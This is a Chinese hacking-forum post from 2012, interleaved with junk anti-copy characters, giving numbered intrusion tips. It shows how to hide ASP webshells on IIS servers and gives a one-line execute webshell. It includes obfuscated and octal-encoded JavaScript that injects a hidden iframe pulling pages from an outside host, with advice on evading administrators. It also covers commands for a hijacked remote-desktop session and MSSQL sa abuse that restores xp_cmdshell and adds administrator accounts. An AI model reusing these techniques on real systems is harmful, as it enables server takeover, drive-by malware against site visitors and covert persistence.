% B. w3 ]* E. J4 A# G8 {2 J$ ?, q
53、隐藏ASP后门的两种方法/ A2 k3 K5 p/ t# v' E* H
1、建立非标准目录:mkdir images..\# J5 A3 M4 ~6 L& D) L% v
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp- r, P- A- h7 t9 w5 l. n
通过web访问ASP木马:http://ip/images../news.asp?action=login
; y6 G% K* t/ c- d9 \3 E9 N+ ^如何删除非标准目录:rmdir images..\ /s# @1 G- K _) m9 ]0 |# h
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:8 U: F/ \0 l# N" q5 k) I
mkdir programme.asp. l9 b) _5 N& |. V5 L
新建1.txt文件内容:<!--#include file=”12.jpg”-->
g" @ P) W% X新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件! C3 B; y( z3 v! f. W) q9 R
attrib +H +S programme.asp
: s5 [; u8 q$ V- b通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt( A6 Q% r" Z0 r+ b
" s8 d& \1 b; V" ]) j f' d54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
2 L, z5 U8 O' Y5 y9 K0 b; h1 L/ [1 s然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
4 b, _3 S( }* K o/ D$ F' e5 M7 n# v( k4 W
55、JS隐蔽挂马
9 ^; C5 z P5 w1.$ ], W+ h" S; k- ?& l
var tr4c3="<iframe src=ht";' Y u; W9 C4 F
tr4c3 = tr4c3+"tp:/";
. @: R) A+ Q6 G9 e! R* ptr4c3 = tr4c3+"/ww";* T9 j4 F) h9 M( t
tr4c3 = tr4c3+"w.tr4";
: D, Q: a% X! Y5 v; ]# ztr4c3 = tr4c3+"c3.com/inc/m";/ H* V3 C' j; p) i- k/ s& p
tr4c3 = tr4c3+"m.htm style="display:none"></i";- t0 M. q2 `& L% Y
tr4c3 =tr4c3+"frame>'";2 n0 K6 M- z' }4 @! U, t+ V
document.write(tr4c3);
8 n& G. J R* Y, j4 b; C' B i避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。/ y z# ]" n' x8 ? f C
/ C; p( P. p. |' }$ b2.1 z. c+ ~& j' d9 U; u
转换进制,然后用EVAL执行。如* W7 O( h+ z S; ]+ A/ X
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");! j1 j+ i) D6 d1 l- [$ e
不过这个有点显眼。
* M0 v+ b. o( \3." W4 R5 p* K3 ]+ x! e" f) f' K
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');+ b% A$ S( o! j) }+ b7 s2 r
最后一点,别忘了把文件的时间也修改下。
4 {1 @1 V/ D* h. a. h3 X3 V- q6 p( [. f# E
56.3389终端入侵常用DOS命令! Y7 L: H" c2 j/ ]# [9 o
taskkill taskkill /PID 1248 /t) a4 C6 u+ L9 {' f
2 X5 i" X3 Z& n6 i7 t: y
tasklist 查进程( J0 L9 V& }$ ^8 `8 A" J0 ?
& r2 w, P" Q$ x4 U1 r9 g6 K5 |
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限7 Y/ g, y$ ^! e, B# Y* T1 b
iisreset /reboot4 G9 a' {3 l2 \7 O( Z, j) F
tsshutdn /reboot /delay:1 重起服务器
% L5 P9 I5 F) i. Z% k% h4 ^3 G" j, w) P4 k+ e: {
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
( [1 `9 Q% u$ F2 p" e
$ J6 L" z5 K: w5 }5 Equery user 查看当前终端用户在线情况
; E7 c. f+ o$ X7 q- K+ ?9 K N4 P
1 a. f6 k9 N' t# @) s+ C要显示有关所有会话使用的进程的信息,请键入:query process *4 E" p4 D- E6 B+ D" c0 C
) R& G0 k0 J. _要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2- ?( @2 s/ P1 N$ V
- @( a4 `7 [# ~" g" A( O9 _
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
* b) H8 g$ H# E2 t8 u( x1 Q2 C
8 c4 R4 k+ l- X* }8 i5 v要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
! L" s% G3 O% s* ?+ c& J& l7 t; \9 I+ P* m* {4 n! ^/ L
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启' O% ?$ B1 O6 l3 z# w
, ]/ r! d8 q: X7 A2 s; E( y$ d8 E命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统* }6 r( x6 ^' J+ f* t- h
3 d# r" V7 K4 F7 X7 H
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
! Y/ a/ h W; I) v/ E( v7 a; t5 s. t, p& k4 ^
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
6 x- ~# M6 ?- g4 ^% N2 g' X# A" s1 |: Y7 o4 m9 r3 l4 D) V
56、在地址栏或按Ctrl+O,输入:
; \! f2 D% W* `' B1 K; jjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
/ ?4 S+ h4 Z+ f4 F7 a3 y8 D4 l
8 J% Q: _$ R% v8 l源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。: d- q/ Z2 R1 l( ~' r
/ P5 t' n# e! t" w8 N, `57、net user的时候,是不能显示加$的用户,但是如果不处理的话,, z3 m O1 v. ?/ d- t; r
用net localgroup administrators是可以看到管理组下,加了$的用户的。$ j6 [! l* {& o- W- b
, L" ] D* Y' _# A% R* @
58、 sa弱口令相关命令
. c k6 O, c. S: F# x z. b0 w$ ~! J2 \$ |' J8 P O& Y9 B2 F
一.更改sa口令方法:
0 w( h7 }9 X4 [用sql综合利用工具连接后,执行命令:, o8 `1 T. M7 ?- G# G
exec sp_password NULL,'20001001','sa'
5 z- V O- n$ n5 H" O$ m; x(提示:慎用!)3 ^- k& n: r& ?3 D
. W' {" d. ?) C$ o) o二.简单修补sa弱口令.+ w4 M2 M, Q# B! O1 T# l, D
. b* w ?, b. e4 T
方法1:查询分离器连接后执行:
* v2 g9 O7 _" Z& nif exists (select * from
J2 j$ ^# o9 X2 Q" P/ b; t5 Xdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
& e# N3 ~9 M! P8 `1 ^/ a! g) ]# KOBJECTPROPERTY(id, N'IsExtendedProc') = 1)% x. t0 {5 @$ C5 D! [( b! J: V
: x3 |/ O+ k @0 [exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'9 `! z, _" @, S
& k9 B1 t0 |3 L; E; O# f5 I
GO6 p/ j6 y' S8 X! n. w; u2 g
) Y: J( s e7 A% S. x8 \+ G3 c
然后按F5键命令执行完毕
" S4 p( ?- B* L2 Q2 _1 n
' q" ~) j- D3 a方法2:查询分离器连接后
3 M" M; q4 k* y第一步执行:use master
* N- y1 o& ]7 f& y, h第二步执行:sp_dropextendedproc 'xp_cmdshell'
% ?/ n& V v; M6 l! u3 d$ m然后按F5键命令执行完毕, V5 e% y5 w! E
! x9 R- |2 z8 X- U$ ?0 d* w& O
7 r7 _1 j$ P" `# Q6 {0 N) |
三.常见情况恢复执行xp_cmdshell.
. ?! z4 J, H7 r6 J T0 n# K& f6 D
$ A( L! [, L% \7 ~1 ^& N2 J; Y* ?+ J7 A8 L4 ?/ o' P' I3 H
1 未能找到存储过程'master..xpcmdshell'.
& \8 m; f' o& X5 Y% _+ C0 x$ k 恢复方法:查询分离器连接后,9 o5 G; W! h; a6 k" e8 h6 F" r
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
3 D2 X4 l' q& D) d8 N2 p第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. `$ X! |2 s- n/ V }4 E z
然后按F5键命令执行完毕
* J& B. Q" N! r/ x' T. r2 n4 U5 u+ a/ C9 r& x
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)' n7 l8 {1 c4 z9 s8 u
恢复方法:查询分离器连接后,( N! ]: N1 H; N! E1 a1 s
第一步执行:sp_dropextendedproc "xp_cmdshell"
& Q) V3 B. H+ U第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 ~0 t' h9 q6 j* ^' h3 H然后按F5键命令执行完毕. c! @0 K+ @3 _. C
- {' J; {' S% e ^% e. n u
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
" V& |* u$ P/ t9 X( W, L恢复方法:查询分离器连接后,8 R! {! ^$ q6 Y
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'1 X8 \1 k5 Z+ e @- P' @4 t( E
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ! p' S& q& H0 T9 }( X; I
然后按F5键命令执行完毕
' s* [. g8 [# k) n9 R
# x8 I: Z1 u9 } N四.终极方法.9 Z N, J0 R! E, d
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:6 _6 D8 P% u6 M
查询分离器连接后,
1 w0 D3 Y8 Y4 K- t! F% B! _2000servser系统:
i0 P* C$ V: ^; a# F/ j" Q9 l( edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
+ W& y$ G- O% B D
4 ~0 \0 n p/ f4 {* k; V( k& R5 Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
, \# G/ U! O; {2 x5 O2 i6 w
- v: i) m' k, O# e1 c" E5 uxp或2003server系统:- M* w C% T. i# i
; n, d! R% T) A3 Y+ l. [declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
! A- ^3 j6 }' f
5 f2 V. j$ P9 H. v; X! fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
* D% D/ B- i7 c8 I2 q5 R5 M9 ^ |
发表于 2012-9-15 14:13:15
收藏
支持
反对